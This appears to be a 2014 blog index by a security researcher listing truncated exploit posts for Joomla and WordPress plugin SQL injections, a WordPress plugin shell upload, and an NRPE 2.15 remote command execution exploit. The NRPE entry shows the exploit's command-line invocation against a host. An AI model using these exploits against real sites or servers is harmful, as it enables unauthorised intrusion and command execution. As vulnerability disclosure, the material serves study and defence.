Joomla Spider Calendar 3.2.6 SQL Injection Exploit + Demo

$$$$$\ $$\ $$$$$$\ $$\ $$\ \__$$ | $$ | $$ __$$\ \__| $$ | $$ | $$$$$$\ $$$$$$\ $$$$$$\$$$$\ $$ | $$$$$$\ $$ / \__| $$$$$$\ $$\ $$$$$$$ | $$$$$$\ $$$$$$\ $$ |$$ __$$\ $$ __$$\ $$ _$$ _$$\ $$ | \____$$\ \$$$$$$\ $$ __$$\ $$ |$$ __$$ |$$ __$$\ $$ __$$\ $$\ $$ |$$ / $$ |$$ / $$ |$$ / $$ / $$ |$$ | $$$$$$$ | \____$$\ $$ / $$ |$$ |$$ / $$ |$$$$$$$$ |$$ | \__| $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ |$$ __$$ | $$\ $$ |$$ | $$ |$$ |$$ | $$ |$$ ____|$$ | \$$$$$$ |\$$$$$$ |\$$$$$$ |$$ | $$ | $$ |$$ |\$$$$$$$ | \$$$$$$ |$$$$$$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$ | \______/ \______/ \______/ \__| \__| \__|\__| \_______| \______/ $$ ____/ \__| \_______| \_______|\__| $$ | $$ | \__| $$$$$$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$$$$\ $$ __$$\ $$ | $$ | $$ ___$$\ $$ __$$\ $$ __$$\ $$ / \__| $$$$$$\ $$ | $$$$$$\ $$$$$$$\ $$$$$$$ | $$$$$$\ $$$$$$\ \_/ $$ | \__/ $$ | $$ / \__| $$ | \____$$\ $$ |$$ __$$\ $$ __$$\ $$ __$$ | \____$$\ $$ __$$\ $$$$$ / $$$$$$ | $$$$$$$\ $$ | $$$$$$$ |$$ |$$$$$$$$ |$$ | $$ |$$ / $$ | $$$$$$$ |$$ | \__| \___$$\ $$ ____/ $$ __$$\ $$ | $$\ $$ __$$ |$$ |$$ ____|$$ | $$ |$$ | $$ |$$ __$$ |$$ | $$\ $$ | $$ | $$ / $$ | \$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ $$ | $$ |\$$$$$$$ |\$$$$$$$ |$$ | \$$$$$$ |$$\ $$$$$$$$\ $$\ $$$$$$ | \______/ \_______|\__| \_______|\__| \__| \_______| \_______|\__| \______/ \__|\________|\__|\______/ j00ml4 Spid3r C4l3nd4r >= 2....

September 6, 2014 · 3 min · claudio

WordPress Spider Facebook 1.0.8 Authenticated SQL Injection

###################### # Exploit Title : WordPress Spider Facebook 1.0.8 Authenticated SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://web-dorado.com/ # Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip # Date : 2014-08-25 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Location : http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php ###################### # Vulnerable code : function Spider_Facebook_manage() { require_once("facebook_manager.php"); require_once("facbook_manager.html.php"); if(!function_exists ('print_html_nav' )) require_once("nav_function/nav_html_func....

September 5, 2014 · 1 min · claudio

WordPress Huge-IT Image Gallery 1.0.1 SQL Injection

###################### # Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://huge-it.com/ # Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip (Fixed) Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs # Date : 2014-08-25 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Location : http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php ###################### # Vulnerable code : function editgallery($id) { global $wpdb; if(isset($_GET["removeslide"])){ if($_GET["removeslide"] !...

September 1, 2014 · 1 min · claudio

WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability

###################### # Exploit Title : WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : http://tribulant.com # Software Link : http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip # Date : 2014-08-09 # Tested on : Windows 7 / Mozilla Firefox ###################### # Description : Any user could upload php files (administrator by default). ###################### # Location http://127.0.0.1/wp-content/plugins/slideshow-gallery/views/admin/slides/save.php ###################### # PoC Exploit: POST Host=127.0.0.1 User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31....

September 1, 2014 · 2 min · claudio

NRPE 2.15 Remote Command Execution Exploit

NRPE 2.15 Remote Command Execution python Exploit – CVE-2014-2913 Download Exploit: HERE Custom Command Mode: claudio@backbox3:~/Desktop$ ./nrpe_215_rce_exploit.py -H 10.0.0.70 --cmd="id" -c check_users $$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$\ $$$$$$$\ $$$\ $$ |$$ __$$\ $$ __$$\ $$ _____| $$ __$$\ $$$$ | $$ ____| $$$$\ $$ |$$ | $$ |$$ | $$ |$$ | \__/ $$ | \_$$ | $$ | $$ $$\$$ |$$$$$$$ |$$$$$$$ |$$$$$\ $$$$$$ | $$ | $$$$$$$\ $$ \$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \_____$$\ $$ |\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\ $$ | $$ | \$$ |$$ | $$ |$$ | $$$$$$$$\ $$$$$$$$\ $$\ $$$$$$\$$$$$$ | \__| \__|\__| \__|\__| \________| \________|\__|\______|\______/ $$$$$$$\ $$$$$$\ $$$$$$$$\ $$ __$$\ $$ __$$\ $$ _____| $$ | $$ |$$ / \__|$$ | $$$$$$$ |$$ | $$$$$\ $$ __$$< $$ | $$ __| $$ | $$ |$$ | $$\ $$ | $$ | $$ |\$$$$$$ |$$$$$$$$\ \__| \__| \______/ \________| NRPE <= 2....

August 28, 2014 · 3 min · claudio